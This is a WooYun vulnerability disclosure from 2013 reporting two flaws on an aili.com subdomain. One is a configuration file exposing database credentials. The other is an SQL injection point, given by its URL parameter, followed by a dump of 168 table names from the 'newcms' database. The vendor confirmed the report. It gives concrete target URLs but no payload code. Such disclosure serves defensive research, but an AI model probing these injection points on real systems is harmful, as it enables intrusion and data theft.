当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018923

漏洞标题:爱丽网某站SQL注射

相关厂商:aili.com

漏洞作者: 小胖子

提交时间:2013-02-20 09:58

修复时间:2013-04-06 09:59

公开时间:2013-04-06 09:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-20: 细节已通知厂商并且等待厂商处理中
2013-02-20: 厂商已经确认,细节仅向厂商公开
2013-03-02: 细节向核心白帽子及相关领域专家公开
2013-03-12: 细节向普通白帽子公开
2013-03-22: 细节向实习白帽子公开
2013-04-06: 细节向公众公开

简要描述:

我们都是神枪手,每一个礼物消灭一个漏洞!

详细说明:

怕重复,还专门问了剑心才发的,欢迎新厂商,希望你们重视信息安全!
问题一:配置文件错误导致SQL数据库账户密码泄漏,可惜是内网。
http://plus.aili.com/1/1/gif.php

SQLerr.jpg


问题2:SQL注射,数据好多啊,读数据读了半天啊!
注入点:http://plus.aili.com/pk.php?a=list&id=28

biao.jpg


biao2.jpg


SQL3.jpg


不一一列举了,详细信息如下。

Database: newcms
[168 tables]
+---------------------------+
| 7120_eastdata_sp |
| 7120_eastdata_ty |
| 7120_eastmedicine_sort |
| 7120_illnessbase |
| 7120_illtype |
| 7120_part |
| 7120_westdata_sp |
| 7120_westdata_ty |
| 7120_westmedicine_sort |
| Jewelry_arc_image |
| Jewelry_archives |
| Jewelry_category |
| Jewelry_vote_config |
| admin |
| admin_arc_upid |
| admin_count |
| admin_panel |
| admin_role |
| admin_role_cat |
| admin_role_priv |
| aili_adsell_brand |
| aili_adsell_type |
| aili_member |
| aili_member_field |
| aili_member_visit |
| aili_store |
| ailimap |
| album_contents |
| albums |
| app_arc_topic |
| app_archives |
| app_channel |
| app_feedback |
| app_images |
| app_topic |
| app_version |
| arc_channel |
| arc_column |
| arc_flag |
| arc_flag_img |
| arc_index |
| arc_recom |
| arc_topic |
| archive_count |
| archive_total |
| archives |
| archives_gq |
| archives_jk |
| articles |
| articles_img |
| articles_play_bak |
| authors |
| block |
| block_art |
| category_priv |
| channel_count |
| channel_total |
| channels |
| collection_content |
| collection_history |
| collection_node |
| collection_program |
| column_count |
| column_order_relation |
| column_total |
| columns |
| comment_bq |
| comment_total |
| comments |
| comments_topic |
| crontab |
| domainip |
| enterprise |
| enterprise_case |
| enterprise_evaluate |
| enterprise_evaluate_score |
| enterprise_info |
| enterprise_level |
| enterprise_type |
| exam_form |
| exam_form_element |
| exam_student |
| exam_student_title |
| exam_title |
| favorites |
| flag |
| friend_link |
| friend_link_class |
| haina_test |
| help |
| help_type |
| history_log |
| homepage |
| hot_tags |
| hot_tags_class |
| images |
| imgs |
| index_count |
| keylist |
| keywords |
| log_albums |
| log_arccreate |
| log_articles |
| log_channels |
| log_columns |
| log_create |
| log_images |
| log_login |
| log_sys |
| log_templet_category |
| log_templets |
| log_topics |
| log_votes |
| mango_field |
| mango_member |
| mango_vote_config |
| menu |
| message |
| msnad |
| navigation |
| new_vote_main |
| new_vote_option |
| new_vote_problem |
| pctag |
| pk_cdata |
| pk_cdata_log |
| pk_comment |
| pk_comment_log |
| pk_tdata |
| pk_tdata_log |
| pk_themes |
| rtss |
| source |
| suggest |
| sys_config |
| sys_config_group |
| tags |
| tags_arc |
| tags_category |
| tags_log |
| tags_relation |
| tags_upid |
| tagscate_channel |
| task |
| task_log |
| templet_canedit |
| templet_category |
| templets |
| topic_block |
| topic_block_style |
| topic_count |
| topic_diy_data |
| topic_diy_tpl |
| topic_hallowmas_ip |
| topic_hallowmas_user |
| topic_history |
| topic_lab_user |
| topic_pic |
| topic_total |
| topics |
| tpl_history |
| tpl_type |
| vote |
| vote_comments |
| vote_count |
| vote_option |
| webnav |
| webnav_class |
+---------------------------+

漏洞证明:

见详细说明。

修复方案:

过滤啊亲,一个礼物消灭一个漏洞?求礼物,求20rank!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-02-20 10:22

厂商回复:

感谢小胖子朋友。信息安全对我们来说很重要。

最新状态:

暂无